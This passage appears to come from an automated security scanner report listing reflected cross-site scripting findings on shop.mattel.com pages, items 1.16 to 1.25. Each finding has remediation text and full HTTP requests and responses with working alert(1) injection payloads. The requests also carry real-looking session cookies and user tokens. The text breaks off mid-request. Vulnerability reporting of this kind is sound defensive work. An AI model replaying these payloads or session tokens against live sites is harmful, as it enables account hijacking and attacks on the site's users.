Path:   /emailSignup/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 62aed--><script>alert(1)</script>19aa858cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /emailSignup/index.jsp?62aed--><script>alert(1)</script>19aa858cf=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:50 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control:
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50783


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/
...[SNIP]...
<!-- === Request Query String: 62aed--><script>alert(1)</script>19aa858cf=1 -->
...[SNIP]...

1.16. http://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /emailSignup/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 130c3"-alert(1)-"e1a4d627d26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /emailSignup/index.jsp?130c3"-alert(1)-"e1a4d627d26=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:49 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control:
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50741


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="130c3"-alert(1)-"e1a4d627d26=1";
   </script>
...[SNIP]...

1.17. http://shop.mattel.com/family/index.jsp [cp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The value of the cp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59b7b"-alert(1)-"9499bf6d796 was submitted in the cp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /family/index.jsp?categoryId=3812552&cp=381231759b7b"-alert(1)-"9499bf6d796 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:13:53 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a52184540545157570f1d0545; expires=Tuesday, 10-Jan-2079 03:28:01 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 73296


                                                                                                                            <!DOCTYPE html PUB
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="http://shop.mattel.com";
    ess['qs']="categoryId=3812552&cp=381231759b7b"-alert(1)-"9499bf6d796";
   </script>
...[SNIP]...

1.18. http://shop.mattel.com/family/index.jsp [cp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The value of the cp request parameter is copied into an HTML comment. The payload 51834--><script>alert(1)</script>f36fc4cd686 was submitted in the cp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /family/index.jsp?categoryId=3812552&cp=381231751834--><script>alert(1)</script>f36fc4cd686 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:13:55 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a52184540545157570f1d0545; expires=Tuesday, 10-Jan-2079 03:28:03 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 73728


                                                                                                                            <!DOCTYPE html PUB
...[SNIP]...
<!-- === Request Query String: categoryId=3812552&cp=381231751834--><script>alert(1)</script>f36fc4cd686 -->
...[SNIP]...

1.19. http://shop.mattel.com/family/index.jsp [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The value of the jsessionid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77aaf"%3balert(1)//1f834e93093 was submitted in the jsessionid parameter. This input was echoed as 77aaf";alert(1)//1f834e93093 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /family/index.jsp;jsessionid=77aaf"%3balert(1)//1f834e93093 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:38 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:28:45 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37504


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                               
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="jsessionid=77aaf";alert(1)//1f834e93093";
   </script>
...[SNIP]...

1.20. http://shop.mattel.com/family/index.jsp [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The value of the jsessionid request parameter is copied into an HTML comment. The payload 320da--><script>alert(1)</script>34133063b89 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /family/index.jsp;jsessionid=320da--><script>alert(1)</script>34133063b89 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:39 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:28:46 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37536


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                               
...[SNIP]...
<!-- === Request Query String: jsessionid=320da--><script>alert(1)</script>34133063b89 -->
...[SNIP]...

1.21. http://shop.mattel.com/family/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9c93c--><script>alert(1)</script>4ed9c217b51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /family/index.jsp?9c93c--><script>alert(1)</script>4ed9c217b51=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:43 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:50 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36930


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                               
...[SNIP]...
<!-- === Request Query String: 9c93c--><script>alert(1)</script>4ed9c217b51=1 -->
...[SNIP]...

1.22. http://shop.mattel.com/family/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fab71"-alert(1)-"9445a5148d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /family/index.jsp?fab71"-alert(1)-"9445a5148d9=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:40 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:47 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36898


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                               
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="http://shop.mattel.com";
    ess['qs']="fab71"-alert(1)-"9445a5148d9=1";
   </script>
...[SNIP]...

1.23. http://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /giftCertificates/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d072a"-alert(1)-"13ed71b93db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /giftCertificates/index.jsp?d072a"-alert(1)-"13ed71b93db=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:46 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43535


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="productId=3738867&d072a"-alert(1)-"13ed71b93db=1";
   </script>
...[SNIP]...

1.24. http://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /giftCertificates/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7abdc--><script>alert(1)</script>ca2770aa469 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /giftCertificates/index.jsp?7abdc--><script>alert(1)</script>ca2770aa469=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:52 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43591


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<!-- === Request Query String: productId=3738867&7abdc--><script>alert(1)</script>ca2770aa469=1 -->
...[SNIP]...

1.25. http://shop.mattel.com/helpdesk/index.jsp [display parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The value of the display request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11184"-alert(1)-"137cfc99da6 was submitted in the display parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /helpdesk/index.jsp?display=store11184"-alert(1)-"137cfc99da6&subdisplay=contact HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
